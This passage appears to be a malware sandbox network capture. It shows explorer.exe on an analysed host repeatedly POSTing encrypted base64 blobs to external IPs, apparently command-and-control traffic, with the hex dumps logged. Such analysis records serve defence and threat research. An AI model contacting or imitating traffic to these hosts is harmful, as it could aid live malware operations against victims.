WMUMWKJU8f4m04hpcJJ7s6jnL51GlIuX5JX0fvsDGrIHOI9RxmoVaUJPsiNRsf57nOJYXQrYbmrn9xkHwf1qjkN0oeonOBLTAF+1acJpawOEg80loVko/lslXe1X6Yy73QfKGhj+wrr2fLPCoxV5iiVMCXkGpJ1gS5rmRsqPff5bc+QiNfulK0VPVnM5jZOlUkN6NaDSrAvVdWMg3sv0R8m0toyxJilSLY3ljw2mkfsPShe43JvPqaXWQGfDDoq
2024-07-27 05:30:56 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:56 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:56 UTC	685	IN	Data Raw: 6e 58 6f 54 78 4e 54 48 4f 6e 66 71 2b 6b 4e 53 38 6b 69 55 67 73 47 36 50 55 54 31 6a 43 4c 61 77 78 72 6a 51 6c 33 78 68 47 38 79 36 56 4e 63 55 6f 51 54 48 34 7a 34 39 66 75 36 42 48 4a 46 63 37 63 70 78 44 6a 32 6b 70 4e 72 64 34 73 35 71 6e 32 43 76 6d 4a 55 74 5a 31 6b 72 72 62 47 35 7a 43 42 43 36 54 72 49 50 42 75 37 46 42 5a 6d 33 6e 47 69 54 52 78 55 59 33 59 6e 58 48 38 72 62 69 67 68 44 36 49 4a 4d 4d 6f 39 41 6c 55 72 33 72 2f 46 6d 44 38 2b 33 78 6a 32 39 53 69 42 56 56 45 63 76 53 31 73 57 76 45 2b 7a 71 4c 45 56 68 32 4e 6d 6a 64 58 4e 6a 45 68 6e 49 5a 34 33 6c 6a 2b 6b 75 6f 33 63 6d 57 38 4f 34 47 6a 59 70 47 73 42 56 35 56 53 42 63 35 75 31 75 43 4f 73 73 4c 4a 67 6e 6e 32 38 61 59 49 62 69 34 4f 78 73 78 2b 78 4d 45 64 52 77 47 51 30 Data Ascii: nXoTxNTHOnfq+kNS8kiUgsG6PUT1jCLawxrjQl3xhG8y6VNcUoQTH4z49fu6BHJFc7cpxDj2kpNrd4s5qn2CvmJUtZ1krrbG5zCBC6TrIPBu7FBZm3nGiTRxUY3YnXH8rbighD6IJMMo9AlUr3r/FmD8+3xj29SiBVVEcvS1sWvE+zqLEVh2NmjdXNjEhnIZ43lj+kuo3cmW8O4GjYpGsBV5VSBc5u1uCOssLJgnn28aYIbi4Oxsx+xMEdRwGQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	51856	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:57 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:30:57 UTC	1122	OUT	Data Raw: 71 5a 33 74 43 31 6c 4b 30 33 77 45 74 64 42 34 2b 41 7a 75 2f 73 4c 39 43 59 36 4f 65 6e 6a 71 68 34 46 6e 58 53 6b 51 35 48 6e 39 48 42 6f 65 77 75 6f 74 6c 59 48 52 70 72 55 7a 39 48 4a 46 48 6a 4f 65 35 67 76 73 59 6e 63 44 48 61 78 63 4b 64 74 6f 55 6b 36 70 4b 7a 69 74 55 57 64 68 4c 6f 4b 49 6e 51 50 30 34 34 77 68 30 49 49 65 63 6b 75 77 2f 53 72 45 34 6d 6d 7a 55 4c 6d 4c 6f 70 44 53 64 58 69 6b 42 2b 41 62 69 5a 6b 32 6c 52 7a 6b 72 76 47 4e 30 74 36 71 49 50 31 7a 41 6f 63 57 34 5a 4c 75 6f 59 66 56 54 78 74 6d 4b 57 73 47 4b 51 66 45 59 6f 75 76 61 58 30 61 4d 33 41 77 2b 56 30 44 58 4c 55 2b 78 4d 4f 44 61 42 41 31 78 4a 4e 6c 51 4e 36 56 5a 34 4d 6c 5a 53 56 69 4a 32 59 31 43 62 34 7a 6c 36 78 4c 77 68 79 46 67 31 62 64 6c 58 72 41 74 71 6f Data Ascii: qZ3tC1lK03wEtdB4+Azu/sL9CY6Oenjqh4FnXSkQ5Hn9HBoewuotlYHRprUz9HJFHjOe5gvsYncDHaxcKdtoUk6pKzitUWdhLoKInQP044wh0IIeckuw/SrE4mmzULmLopDSdXikB+AbiZk2lRzkrvGN0t6qIP1zAocW4ZLuoYfVTxtmKWsGKQfEYouvaX0aM3Aw+V0DXLU+xMODaBA1xJNlQN6VZ4MlZSViJ2Y1Cb4zl6xLwhyFg1bdlXrAtqo
2024-07-27 05:30:58 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:58 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:58 UTC	685	IN	Data Raw: 49 38 55 36 32 34 47 56 6f 4f 33 54 75 63 58 51 36 2b 53 65 5a 6a 64 65 70 65 6a 4c 64 42 4d 7a 36 79 74 41 48 4b 51 35 6c 75 6b 6b 75 76 51 38 38 53 34 2f 7a 46 45 72 43 76 2f 65 42 46 61 68 6b 48 35 2b 71 6c 75 53 6d 50 51 4b 6c 52 46 6c 56 42 2f 76 4e 78 66 37 79 38 5a 50 78 46 65 48 57 55 59 36 68 58 58 71 6a 78 6b 50 4e 63 5a 71 76 68 55 6a 2f 74 39 56 37 44 62 4c 63 62 38 67 59 46 52 67 6a 50 6f 42 4c 57 4e 54 47 2f 34 48 75 44 4e 79 4e 75 38 34 43 69 41 51 45 54 4c 43 61 58 58 59 75 6f 6e 77 7a 2f 5a 47 57 48 70 42 77 2f 56 44 4f 65 65 4a 6e 59 59 67 49 2f 68 68 35 32 68 70 70 67 34 45 67 68 64 32 53 39 53 79 46 44 4b 39 64 41 47 2b 30 31 4f 33 6f 30 6b 70 50 6e 7a 6a 39 38 33 65 76 65 59 2f 50 50 38 71 75 54 4d 70 2f 62 75 53 56 38 54 74 32 62 41 Data Ascii: I8U624GVoO3TucXQ6+SeZjdepejLdBMz6ytAHKQ5lukkuvQ88S4/zFErCv/eBFahkH5+qluSmPQKlRFlVB/vNxf7y8ZPxFeHWUY6hXXqjxkPNcZqvhUj/t9V7DbLcb8gYFRgjPoBLWNTG/4HuDNyNu84CiAQETLCaXXYuonwz/ZGWHpBw/VDOeeJnYYgI/hh52hppg4Eghd2S9SyFDK9dAG+01O3o0kpPnzj983eveY/PP8quTMp/buSV8Tt2bA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	51857	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:59 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:30:59 UTC	1267	OUT	Data Raw: 58 78 42 46 38 39 2b 6a 6f 35 6c 72 49 36 54 31 59 44 38 4c 6d 62 30 45 78 2f 7a 45 50 33 73 34 6b 61 59 58 71 4a 48 32 65 45 4b 58 63 36 6a 76 6b 37 69 4f 70 6d 74 77 48 6a 35 48 45 44 46 4f 49 33 58 74 68 79 51 30 43 6c 6c 7a 4b 44 75 6d 46 77 6c 4f 74 65 63 5a 6b 4b 6c 53 52 6c 67 46 33 41 73 57 5a 55 4a 76 73 44 62 68 54 50 34 6d 73 65 78 32 53 64 59 70 74 4e 5a 42 4b 54 65 56 4d 2b 4e 7a 31 75 52 37 67 66 5a 67 35 58 2f 31 39 50 4d 6e 33 61 35 6e 72 71 59 64 49 49 78 6b 73 49 6b 52 76 6d 59 62 34 76 2f 31 4d 66 6a 43 54 4c 65 44 37 65 4c 53 48 77 43 6d 73 77 2f 4a 6e 77 6e 35 35 71 48 59 59 43 31 76 33 6b 78 4c 6d 54 79 4f 33 39 71 64 36 34 44 52 37 72 36 4d 33 56 36 4c 72 72 64 47 4b 61 39 5a 56 39 75 75 6a 46 4e 7a 5a 50 6d 31 35 53 6c 69 44 51 4d Data Ascii: XxBF89+jo5lrI6T1YD8Lmb0Ex/zEP3s4kaYXqJH2eEKXc6jvk7iOpmtwHj5HEDFOI3XthyQ0CllzKDumFwlOtecZkKlSRlgF3AsWZUJvsDbhTP4msex2SdYptNZBKTeVM+Nz1uR7gfZg5X/19PMn3a5nrqYdIIxksIkRvmYb4v/1MfjCTLeD7eLSHwCmsw/Jnwn55qHYYC1v3kxLmTyO39qd64DR7r6M3V6LrrdGKa9ZV9uujFNzZPm15SliDQM
2024-07-27 05:31:00 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:00 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:00 UTC	685	IN	Data Raw: 4b 47 41 45 56 57 54 4e 52 6f 36 44 4d 32 44 65 54 67 51 66 4b 52 56 43 43 61 6e 4d 65 6e 37 45 66 41 4f 64 59 50 78 73 79 33 54 4e 47 6e 66 38 74 64 68 2f 43 7a 44 43 4e 48 38 57 67 71 51 41 4d 71 79 61 78 67 52 5a 5a 4b 73 53 74 7a 57 30 2f 41 6c 63 58 46 4e 57 76 6f 70 46 33 44 55 4b 56 42 4a 39 46 63 4e 58 7a 6a 2b 58 77 35 6e 2b 62 6a 52 6e 49 52 79 72 48 38 32 70 32 32 53 59 36 75 2f 73 51 66 66 75 66 61 56 74 59 37 39 68 41 36 71 70 4a 41 4e 72 6d 51 33 2f 6d 71 71 64 2f 79 59 35 6d 52 6d 58 6d 67 64 54 65 76 68 53 37 32 43 45 55 51 70 4e 6a 54 66 55 30 70 76 33 61 4e 55 46 64 68 2f 75 69 34 67 69 44 49 7a 4b 56 75 39 72 65 70 45 6a 4a 5a 5a 36 59 4a 50 34 6a 2f 4c 75 7a 72 6f 43 46 54 45 68 4b 45 6d 35 68 32 44 6d 46 2f 50 33 75 46 37 38 6e 35 38 Data Ascii: KGAEVWTNRo6DM2DeTgQfKRVCCanMen7EfAOdYPxsy3TNGnf8tdh/CzDCNH8WgqQAMqyaxgRZZKsStzW0/AlcXFNWvopF3DUKVBJ9FcNXzj+Xw5n+bjRnIRyrH82p22SY6u/sQffufaVtY79hA6qpJANrmQ3/mqqd/yY5mRmXmgdTevhS72CEUQpNjTfU0pv3aNUFdh/ui4giDIzKVu9repEjJZZ6YJP4j/LuzroCFTEhKEm5h2DmF/P3uF78n58

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	51859	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:01 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:31:01 UTC	1267	OUT	Data Raw: 44 6f 4c 47 31 72 6a 66 64 75 70 62 38 34 43 78 66 54 73 69 6c 45 68 7a 63 44 33 30 79 30 7a 57 59 71 67 31 7a 7a 57 52 6e 43 6a 78 74 35 74 4b 63 30 6f 39 4b 45 2f 69 61 4c 6a 42 6b 78 6a 59 45 55 4f 4e 57 65 45 52 4d 43 41 46 61 6f 69 67 4f 4e 30 6f 52 6f 64 49 6d 74 65 76 46 6d 51 64 78 6e 52 4a 79 65 4e 30 38 71 4a 53 72 2b 67 6c 64 64 44 72 62 2f 47 79 45 4c 30 77 6d 6b 46 69 6e 62 34 65 38 2b 55 72 77 2b 4c 72 66 4a 47 32 44 4a 2f 73 5a 59 69 49 6e 45 77 66 5a 76 33 47 6c 76 56 5a 6d 30 74 4e 56 54 4a 46 4b 73 4a 33 76 6c 33 76 6f 33 4b 58 6d 6c 44 30 79 79 31 47 49 4e 75 76 43 5a 56 2f 6f 5a 6c 36 39 72 36 47 72 31 44 5a 37 30 43 6a 62 6a 67 33 76 30 73 67 66 41 72 77 67 75 4a 66 69 70 65 72 6c 69 33 6f 6b 72 37 41 66 6d 50 79 65 6a 67 35 67 72 62 Data Ascii: DoLG1rjfdupb84CxfTsilEhzcD30y0zWYqg1zzWRnCjxt5tKc0o9KE/iaLjBkxjYEUONWeERMCAFaoigON0oRodImtevFmQdxnRJyeN08qJSr+glddDrb/GyEL0wmkFinb4e8+Urw+LrfJG2DJ/sZYiInEwfZv3GlvVZm0tNVTJFKsJ3vl3vo3KXmlD0yy1GINuvCZV/oZl69r6Gr1DZ70Cjbjg3v0sgfArwguJfiperli3okr7AfmPyejg5grb
2024-07-27 05:31:02 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:02 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:02 UTC	685	IN	Data Raw: 70 65 75 58 78 39 58 7a 2f 4f 34 38 6d 64 36 4f 74 66 76 53 4b 73 50 35 2b 76 72 54 51 63 4d 33 41 32 2f 52 66 58 37 2f 74 41 75 44 47 4b 58 61 38 51 6b 6e 44 56 63 6c 4f 6f 45 55 49 4a 64 6b 52 68 52 67 4f 51 56 6a 4c 58 6d 66 5a 63 76 4a 59 51 58 63 49 71 72 6b 6c 47 31 6e 73 68 38 54 54 2b 33 46 61 39 7a 36 39 67 59 51 55 49 5a 2f 75 42 31 35 54 2b 54 2b 50 37 36 51 4c 51 2f 65 50 4c 6c 78 58 61 6a 45 7a 61 52 6b 6b 51 36 64 54 34 51 71 44 30 7a 62 79 2b 66 31 6a 72 58 6d 54 36 47 2b 4a 39 70 48 4e 6c 56 56 70 2f 69 4a 42 71 72 58 49 68 5a 50 54 5a 44 53 7a 31 47 6a 38 4a 5a 6c 41 52 4f 7a 78 35 4c 36 77 5a 6c 76 4e 45 63 45 35 52 36 6e 71 74 49 35 37 67 62 57 43 4d 61 4c 5a 49 39 49 55 6c 4a 69 51 34 70 51 77 4e 4a 56 41 6d 62 6b 73 2f 50 57 39 71 48 Data Ascii: peuXx9Xz/O48md6OtfvSKsP5+vrTQcM3A2/RfX7/tAuDGKXa8QknDVclOoEUIJdkRhRgOQVjLXmfZcvJYQXcIqrklG1nsh8TT+3Fa9z69gYQUIZ/uB15T+T+P76QLQ/ePLlxXajEzaRkkQ6dT4QqD0zby+f1jrXmT6G+J9pHNlVVp/iJBqrXIhZPTZDSz1Gj8JZlAROzx5L6wZlvNEcE5R6nqtI57gbWCMaLZI9IUlJiQ4pQwNJVAmbks/PW9qH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	51860	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:03 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:03 UTC	1122	OUT	Data Raw: 69 31 55 4e 58 32 39 79 79 71 62 73 74 44 73 6b 51 75 78 2f 6c 51 31 66 51 54 49 75 41 6b 33 44 4c 6d 4e 7a 38 37 6a 4e 57 6a 64 65 32 4d 36 57 4a 57 4e 49 6e 76 4e 59 34 75 53 49 73 70 45 46 57 77 2f 45 6d 43 58 41 4d 42 62 38 39 52 61 33 42 61 39 31 71 53 69 55 54 42 4c 46 31 4c 62 36 47 5a 53 30 61 71 50 36 49 62 67 49 34 57 36 52 46 66 52 73 75 6a 41 79 32 66 44 6a 7a 6c 42 2b 62 4b 32 2f 43 4d 68 5a 30 6a 74 6d 4e 41 33 61 76 31 43 32 44 72 37 73 32 4d 63 58 55 47 68 39 31 52 75 52 47 62 72 65 72 63 58 63 63 53 4e 55 65 73 6f 46 30 37 4f 4c 61 77 72 31 54 50 76 52 4b 56 58 51 39 6c 58 58 74 75 48 4f 4f 6e 63 42 52 6a 49 58 6f 4c 2f 4e 33 55 62 69 78 53 62 33 6d 49 6f 51 69 6f 34 62 43 61 6b 74 45 69 6d 6a 76 6d 59 69 59 39 45 68 52 64 69 4c 39 52 66 Data Ascii: i1UNX29yyqbstDskQux/lQ1fQTIuAk3DLmNz87jNWjde2M6WJWNInvNY4uSIspEFWw/EmCXAMBb89Ra3Ba91qSiUTBLF1Lb6GZS0aqP6IbgI4W6RFfRsujAy2fDjzlB+bK2/CMhZ0jtmNA3av1C2Dr7s2McXUGh91RuRGbrercXccSNUesoF07OLawr1TPvRKVXQ9lXXtuHOOncBRjIXoL/N3UbixSb3mIoQio4bCaktEimjvmYiY9EhRdiL9Rf
2024-07-27 05:31:04 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:04 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:04 UTC	685	IN	Data Raw: 51 6d 41 64 4e 54 57 2b 44 62 42 4c 53 51 35 44 31 70 78 63 4b 6d 37 4a 61 45 44 37 53 33 39 42 33 48 47 4e 55 49 67 63 44 52 57 46 66 72 62 57 58 59 36 30 64 48 54 6f 6a 33 57 30 64 78 4f 4d 67 36 31 68 5a 70 37 39 56 42 63 2f 76 71 62 70 4f 7a 36 65 70 4a 77 44 30 6e 64 6f 65 50 35 42 46 70 4b 44 36 2b 57 6a 30 73 64 36 6c 54 2f 66 66 66 64 4c 4a 30 64 64 30 2b 68 73 54 55 66 59 6a 4f 64 43 61 47 62 37 53 77 50 68 39 46 57 42 53 36 6a 4b 33 5a 62 7a 6b 38 58 61 55 64 2f 54 30 53 4f 46 74 34 78 38 64 71 65 4e 6f 50 69 4b 63 53 58 36 2b 30 64 62 37 67 49 63 35 4c 57 67 43 67 35 72 6f 6d 6b 34 37 37 4e 72 61 50 72 65 39 43 4a 50 6e 41 59 7a 43 57 4d 30 67 4f 6a 6e 69 63 68 2f 6f 74 2b 47 4e 74 37 6e 48 67 65 42 4a 67 66 67 4b 2b 72 64 49 6a 4a 32 34 69 6d Data Ascii: QmAdNTW+DbBLSQ5D1pxcKm7JaED7S39B3HGNUIgcDRWFfrbWXY60dHToj3W0dxOMg61hZp79VBc/vqbpOz6epJwD0ndoeP5BFpKD6+Wj0sd6lT/fffdLJ0dd0+hsTUfYjOdCaGb7SwPh9FWBS6jK3Zbzk8XaUd/T0SOFt4x8dqeNoPiKcSX6+0db7gIc5LWgCg5romk477NraPre9CJPnAYzCWM0gOjnich/ot+GNt7nHgeBJgfgK+rdIjJ24im

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	51861	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:05 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:05 UTC	1122	OUT	Data Raw: 57 50 4d 48 72 44 4f 6a 33 4a 32 6f 56 63 59 54 53 63 39 76 44 7a 65 61 67 6a 57 32 68 34 6e 45 65 4c 74 78 71 37 33 50 4f 65 77 2b 79 6c 62 68 43 45 70 4b 42 6f 74 78 77 6d 63 78 38 71 34 6c 4b 72 70 6d 78 48 55 67 58 49 34 42 72 66 65 6d 61 74 75 63 38 62 4c 58 47 35 6d 6e 45 44 57 75 6e 52 71 45 64 4c 2f 6f 43 47 74 52 78 70 52 4a 76 4b 5a 37 38 52 59 4f 76 32 48 58 39 78 6c 6a 73 55 6e 48 31 59 42 44 31 46 6d 2f 32 36 4f 74 35 46 54 6c 36 30 69 6c 6e 61 71 42 51 2b 51 52 4d 4b 73 77 4c 51 51 48 67 52 48 72 7a 31 56 46 30 38 38 31 6c 75 36 73 74 6e 39 2b 6f 70 38 42 38 4f 71 57 71 6b 79 6c 4b 55 68 4b 42 43 48 2b 4a 48 69 37 75 69 73 56 35 48 50 6d 37 68 49 2b 37 53 58 51 71 2f 69 5a 35 6d 32 78 62 38 56 45 32 74 70 52 76 47 76 6b 32 75 49 34 32 65 58 Data Ascii: WPMHrDOj3J2oVcYTSc9vDzeagjW2h4nEeLtxq73POew+ylbhCEpKBotxwmcx8q4lKrpmxHUgXI4Brfematuc8bLXG5mnEDWunRqEdL/oCGtRxpRJvKZ78RYOv2HX9xljsUnH1YBD1Fm/26Ot5FTl60ilnaqBQ+QRMKswLQQHgRHrz1VF0881lu6stn9+op8B8OqWqkylKUhKBCH+JHi7uisV5HPm7hI+7SXQq/iZ5m2xb8VE2tpRvGvk2uI42eX
2024-07-27 05:31:06 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:06 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:06 UTC	685	IN	Data Raw: 49 44 30 37 74 6a 6d 49 6c 77 67 45 57 59 57 6f 42 30 42 79 53 73 4a 2b 64 71 31 35 52 73 73 71 47 49 72 6b 56 4d 35 34 6f 59 41 64 66 35 33 4d 38 52 49 69 6c 38 72 79 74 5a 78 64 75 66 4b 42 77 74 33 68 70 71 70 56 74 65 59 31 45 5a 43 37 38 68 55 67 48 4c 4a 45 4a 41 57 2b 2b 47 7a 76 64 32 4c 69 33 7a 75 6b 6d 54 55 67 75 6c 47 48 4a 2b 6d 6c 41 6c 49 38 66 69 76 52 34 6f 2f 61 42 48 68 37 55 49 4e 68 57 56 36 66 34 72 30 68 4c 6c 64 51 58 6a 48 2b 53 78 50 59 53 73 4d 52 50 4b 69 4f 78 71 6b 66 67 47 6b 5a 35 6a 68 2b 59 30 32 5a 4c 76 6d 64 5a 31 6e 52 52 67 30 77 48 77 64 2f 57 41 6a 55 37 4b 74 50 75 4e 74 57 35 66 50 72 39 4a 48 68 35 37 6d 77 54 74 4d 46 56 78 4c 51 44 6e 6a 34 36 65 6a 37 68 2b 76 77 4f 69 52 6d 35 7a 31 67 7a 39 66 70 48 42 30 Data Ascii: ID07tjmIlwgEWYWoB0BySsJ+dq15RssqGIrkVM54oYAdf53M8RIil8rytZxdufKBwt3hpqpVteY1EZC78hUgHLJEJAW++Gzvd2Li3zukmTUgulGHJ+mlAlI8fivR4o/aBHh7UINhWV6f4r0hLldQXjH+SxPYSsMRPKiOxqkfgGkZ5jh+Y02ZLvmdZ1nRRg0wHwd/WAjU7KtPuNtW5fPr9JHh57mwTtMFVxLQDnj46ej7h+vwOiRm5z1gz9fpHB0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	51862	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:07 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:07 UTC	1122	OUT	Data Raw: 6e 62 63 68 65 43 74 6b 39 2b 44 39 47 6b 57 41 51 41 79 30 61 4c 67 30 70 4f 74 6d 4d 37 62 4c 62 74 50 59 6e 35 7a 33 6b 5a 77 72 37 36 56 73 4d 56 54 70 57 6e 32 5a 48 41 42 63 75 39 32 68 65 62 31 6c 4e 32 47 54 6d 39 6d 53 6c 63 55 73 70 78 61 46 65 66 33 61 66 62 34 6d 37 52 51 4d 72 54 47 46 36 30 48 36 76 49 61 53 7a 4d 4d 48 54 44 41 4a 73 38 4b 30 39 78 31 6b 2b 46 49 6c 78 46 64 58 71 6f 72 71 4b 73 44 52 43 69 54 36 33 6f 65 38 42 6b 53 59 45 73 6f 46 4b 52 6e 35 42 73 69 74 4d 38 75 55 79 61 36 77 49 76 2f 6b 49 7a 6c 73 65 79 67 6c 35 31 71 63 72 66 4e 2f 4f 50 33 58 67 4a 2b 68 42 53 79 79 41 79 6b 76 54 30 70 6c 6d 75 63 67 65 43 30 35 58 6c 38 5a 32 46 63 79 43 48 6e 48 58 35 77 4f 33 46 71 4d 75 73 43 6b 74 66 62 37 47 4e 65 6a 6f 76 45 Data Ascii: nbcheCtk9+D9GkWAQAy0aLg0pOtmM7bLbtPYn5z3kZwr76VsMVTpWn2ZHABcu92heb1lN2GTm9mSlcUspxaFef3afb4m7RQMrTGF60H6vIaSzMMHTDAJs8K09x1k+FIlxFdXqorqKsDRCiT63oe8BkSYEsoFKRn5BsitM8uUya6wIv/kIzlseygl51qcrfN/OP3XgJ+hBSyyAykvT0plmucgeC05Xl8Z2FcyCHnHX5wO3FqMusCktfb7GNejovE
2024-07-27 05:31:08 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:08 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:08 UTC	685	IN	Data Raw: 59 55 55 67 50 48 57 5a 32 56 64 42 4a 67 45 31 4c 4e 71 4a 63 7a 64 64 53 33 47 59 54 7a 6f 48 31 55 48 59 41 6a 34 59 30 74 64 52 52 4e 4e 63 72 2b 43 4f 45 7a 2f 50 30 46 64 53 4d 65 66 33 33 6c 6c 57 31 4f 4b 65 69 63 50 30 39 58 30 75 74 35 58 6c 36 35 42 46 6c 4b 33 6e 6e 44 30 70 34 4b 6b 76 49 76 4e 71 39 61 53 67 59 4c 37 74 77 4a 66 51 6a 57 39 63 75 65 68 63 7a 48 70 4c 78 4c 49 49 51 44 72 30 56 46 74 6f 34 35 31 4f 66 78 65 56 38 56 33 4d 6d 46 78 47 2b 70 65 34 55 76 45 38 42 4f 33 6f 79 74 4c 67 7a 39 4f 42 47 73 4c 59 52 30 72 56 38 53 2f 47 44 78 78 55 4f 43 73 55 74 4d 4f 52 4a 41 4c 6b 61 30 6d 70 37 74 66 73 6c 70 4f 59 6c 76 37 47 58 67 57 57 67 37 35 32 79 53 65 61 56 64 4b 42 57 68 64 55 30 38 41 55 39 49 51 52 69 32 61 37 64 45 62 Data Ascii: YUUgPHWZ2VdBJgE1LNqJczddS3GYTzoH1UHYAj4Y0tdRRNNcr+COEz/P0FdSMef33llW1OKeicP09X0ut5Xl65BFlK3nnD0p4KkvIvNq9aSgYL7twJfQjW9cuehczHpLxLIIQDr0VFto451OfxeV8V3MmFxG+pe4UvE8BO3oytLgz9OBGsLYR0rV8S/GDxxUOCsUtMORJALka0mp7tfslpOYlv7GXgWWg752ySeaVdKBWhdU08AU9IQRi2a7dEb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	51863	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:09 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:09 UTC	1122	OUT	Data Raw: 68 4b 31 69 56 79 77 31 35 68 67 46 75 79 4a 46 63 61 43 72 6d 2b 37 6e 2b 50 4e 79 41 45 42 47 54 55 57 76 49 2f 49 52 2f 6f 76 4d 4b 6c 57 5a 49 47 69 2f 69 73 77 38 45 46 71 54 73 76 44 6a 2b 39 70 31 78 51 59 33 30 5a 38 4b 31 49 38 4d 6a 74 46 47 73 58 42 61 42 6d 6b 54 4b 47 6c 69 39 51 74 58 71 45 73 4c 68 73 67 79 76 6e 44 6e 65 53 62 6e 68 43 55 51 36 48 62 2f 34 58 4a 49 35 51 77 4c 45 33 6f 76 51 2f 46 34 6e 7a 78 30 78 49 6b 4d 30 46 47 6c 57 65 37 4e 74 6f 6d 4f 33 74 71 58 46 6b 37 65 4a 55 65 61 50 69 51 53 74 42 52 66 5a 39 4b 54 68 39 71 72 73 6d 72 66 6d 4c 69 52 2b 43 2b 36 4a 53 67 7a 39 70 50 41 64 52 66 78 64 61 4d 6f 53 44 54 6c 53 53 50 44 53 6d 36 79 31 42 43 7a 56 75 78 70 56 59 6c 47 41 7a 66 4a 5a 63 74 74 61 76 6d 6a 6d 64 68 Data Ascii: hK1iVyw15hgFuyJFcaCrm+7n+PNyAEBGTUWvI/IR/ovMKlWZIGi/isw8EFqTsvDj+9p1xQY30Z8K1I8MjtFGsXBaBmkTKGli9QtXqEsLhsgyvnDneSbnhCUQ6Hb/4XJI5QwLE3ovQ/F4nzx0xIkM0FGlWe7NtomO3tqXFk7eJUeaPiQStBRfZ9KTh9qrsmrfmLiR+C+6JSgz9pPAdRfxdaMoSDTlSSPDSm6y1BCzVuxpVYlGAzfJZcttavmjmdh
2024-07-27 05:31:10 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:10 GMT Content-Type: text/plain; charset=utf-8 Connection: close
